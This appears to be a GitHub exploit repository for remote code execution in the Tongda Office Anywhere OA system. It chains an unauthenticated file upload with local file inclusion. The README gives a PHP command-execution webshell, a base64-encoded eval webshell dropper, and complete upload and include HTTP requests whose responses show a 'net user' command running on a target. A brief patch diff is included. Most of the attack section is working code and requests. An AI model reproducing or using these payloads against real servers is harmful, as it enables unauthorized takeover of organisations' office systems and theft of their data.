├── Auth-Getshell.gif
├── README.md
├── gateway.jpg
├── tongda.gif
├── tongda.png
├── tongda
    ├── decode
    │   ├── gateway.php
    │   ├── upload-fix.php
    │   └── upload.php
    ├── gateway.php
    └── upload.php
└── upload.jpg


/Auth-Getshell.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/Auth-Getshell.gif


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # OA-tongda-RCE | Office Anywhere网络智能办公系统
  2 | 
  3 | ![](tongda.gif)
  4 | 
  5 | ## 后台Getshell
  6 | 
  7 | ![](./Auth-Getshell.gif)
  8 | 
  9 | ## 无需身份认证
 10 | 
 11 | 1. 任意文件上传漏洞 /ispirit/im/upload.php
 12 | 
 13 | 2. 本地文件包含漏洞 /ispirit/interface/gateway.php
 14 | 
 15 | ![](./tongda.png)
 16 | 
 17 | ## 命令执行绕过：
 18 | 
 19 | ```
 20 | <?php
 21 | $command=$_POST['cmd'];
 22 | $wsh = new COM('WScript.shell');
 23 | $exec = $wsh->exec("cmd /c ".$command);
 24 | $stdout = $exec->StdOut();
 25 | $stroutput = $stdout->ReadAll();
 26 | echo $stroutput;
 27 | ?>
 28 | ```
 29 | 
 30 | ## GetWebshell
 31 | ```
 32 | <?php
 33 | $fp = fopen('readme.php', 'w');
 34 | $a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ3Bhc3MnXSkpCnsKICAgICRrZXk9c3Vic3RyKG1kNSh1bmlxaWQocmFuZCgpKSksMTYpOwogICAgJF9TRVNTSU9OWydrJ109JGtleTsKICAgIHByaW50ICRrZXk7Cn0KZWxzZQp7CiAgICAka2V5PSRfU0VTU0lPTlsnayddOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHApIHtldmFsKCRwLiIiKTt9fQoJQG5ldyBDKCRwYXJhbXMpOwp9Cj8+");
 35 | fwrite($fp, $a);
 36 | fclose($fp);
 37 | ?>
 38 | ```
 39 | 
 40 | ## php Zend 解码
 41 | 
 42 | http://dezend.qiling.org/free.html
 43 | 
 44 | ## 补丁修复 /ispirit/im/upload.php
 45 | 
 46 | 原
 47 | ```
 48 | <?php
 49 | 
 50 | set_time_limit(0);
 51 | $P = $_POST['P'];
 52 | if (isset($P) || $P != '') {
 53 |     ob_start();
 54 |     include_once 'inc/session.php';
 55 |     session_id($P);
 56 |     session_start();
 57 |     session_write_close();
 58 | } else {
 59 |     include_once './auth.php';
 60 | }
 61 | ```
 62 | 
 63 | 删掉了else判断，直接包含/auth.php
 64 | ```
 65 | <?
 66 | 
 67 | //lp 2012/11/29 1:26:01 兼容客户端提交数据时无session的情况
 68 | if(isset($P) || $P!="")
 69 | {
 70 |    ob_start();
 71 |    include_once("inc/session.php");
 72 |    session_id($P);
 73 |    session_start();
 74 |    session_write_close();
 75 | }
 76 | 
 77 | include_once("./auth.php");
 78 | ```
 79 | 
 80 | ## auth.php
 81 | 
 82 | ```
 83 | <?php
 84 | 
 85 | include_once 'inc/session.php';
 86 | session_start();
 87 | session_write_close();
 88 | include_once 'inc/conn.php';
 89 | include_once 'inc/utility.php';
 90 | ob_start();
 91 | if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
 92 |     sleep(1);
 93 |     if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
 94 |         echo '-ERR ' . _('用户未登陆');
 95 |         exit;
 96 |     }
 97 | }
 98 | ```
 99 | 
100 | ## 版本路径
101 | 有些版本gateway.php路径不同
102 | 
103 | 例如2013：
104 | 
105 | ```
106 | /ispirit/im/upload.php
107 | /ispirit/interface/gateway.php
108 | ```
109 | 例如2017：
110 | 
111 | ```
112 | /ispirit/im/upload.php
113 | /mac/gateway.php
114 | 
115 | C:\MYOA>dir /s /b gateway.php
116 | C:\MYOA\webroot\mac\gateway.php
117 | ```
118 | 
119 | ## Burpsuite upload file Request
120 | 
121 | ![](./upload.jpg)
122 | 
123 | ```
124 | POST /ispirit/im/upload.php HTTP/1.1
125 | Host: 10.10.20.116:88
126 | Content-Length: 658
127 | Cache-Control: no-cache
128 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
129 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
130 | Accept: */*
131 | Accept-Encoding: gzip, deflate
132 | Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
133 | Cookie: PHPSESSID=123
134 | Connection: close
135 | 
136 | ------WebKitFormBoundarypyfBh1YB4pV8McGB
137 | Content-Disposition: form-data; name="UPLOAD_MODE"
138 | 
139 | 2
140 | ------WebKitFormBoundarypyfBh1YB4pV8McGB
141 | Content-Disposition: form-data; name="P"
142 | 
143 | 123
144 | ------WebKitFormBoundarypyfBh1YB4pV8McGB
145 | Content-Disposition: form-data; name="DEST_UID"
146 | 
147 | 1
148 | ------WebKitFormBoundarypyfBh1YB4pV8McGB
149 | Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
150 | Content-Type: image/jpeg
151 | 
152 | <?php
153 | $command=$_POST['cmd'];
154 | $wsh = new COM('WScript.shell');
155 | $exec = $wsh->exec("cmd /c ".$command);
156 | $stdout = $exec->StdOut();
157 | $stroutput = $stdout->ReadAll();
158 | echo $stroutput;
159 | ?>
160 | ------WebKitFormBoundarypyfBh1YB4pV8McGB--
161 | 
162 | ```
163 | ## Response
164 | ```
165 | HTTP/1.1 200 OK
166 | Server: nginx
167 | Date: Wed, 18 Mar 2020 03:57:38 GMT
168 | Content-Type: text/html; charset=gbk
169 | Connection: close
170 | Vary: Accept-Encoding
171 | Set-Cookie: PHPSESSID=123; path=/
172 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
173 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
174 | Pragma: no-cache
175 | X-Frame-Options: SAMEORIGIN
176 | Content-Length: 38
177 | 
178 | +OK [vm]2881@2003_938379153|jpg|0[/vm]
179 | ```
180 | filename = 2003/938379153.jpg
181 | ## Burpsuite include file Request
182 | 
183 | ![](./gateway.jpg)
184 | 
185 | ```
186 | POST /mac/gateway.php HTTP/1.1
187 | Host: 10.10.20.116:88
188 | Connection: keep-alive
189 | Accept-Encoding: gzip, deflate
190 | Accept: */*
191 | User-Agent: python-requests/2.21.0
192 | Content-Length: 71
193 | Content-Type: application/x-www-form-urlencoded
194 | 
195 | json={"url":"/general/../../attach/im/2003/938379153.jpg"}&cmd=net user
196 | ```
197 | 
198 | ## Response
199 | 
200 | ```
201 | HTTP/1.1 200 OK
202 | Server: nginx
203 | Date: Wed, 18 Mar 2020 03:59:44 GMT
204 | Content-Type: text/html; charset=gbk
205 | Connection: keep-alive
206 | Vary: Accept-Encoding
207 | X-Frame-Options: SAMEORIGIN
208 | Content-Length: 217
209 | 
210 | 
211 | 
212 | \\ 的用户帐户
213 | 
214 | -------------------------------------------------------------------------------
215 | Administrator            Guest                    jas502n                  
216 | 命令运行完毕，但发生一个或多个错误。
217 | 
218 | ```
219 | 
220 | ## 参考链接
221 | 
222 | http://blog.fuzz.pub/2020/03/17/%E9%80%9A%E8%BE%BEoa%20RCE%20%E5%88%86%E6%9E%90/
223 | 
224 | http://cdndown.tongda2000.com/oasp/2019/2020_A1.rar
225 | 


--------------------------------------------------------------------------------
/gateway.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/gateway.jpg


--------------------------------------------------------------------------------
/tongda.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda.gif


--------------------------------------------------------------------------------
/tongda.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda.png


--------------------------------------------------------------------------------
/tongda/decode/gateway.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda/decode/gateway.php


--------------------------------------------------------------------------------
/tongda/decode/upload-fix.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda/decode/upload-fix.php


--------------------------------------------------------------------------------
/tongda/decode/upload.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda/decode/upload.php


--------------------------------------------------------------------------------
/tongda/gateway.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda/gateway.php


--------------------------------------------------------------------------------
/tongda/upload.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/tongda/upload.php


--------------------------------------------------------------------------------
/upload.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/OA-tongda-RCE/b5b010852ac0b9779fcabd7c6634057debe32e55/upload.jpg


--------------------------------------------------------------------------------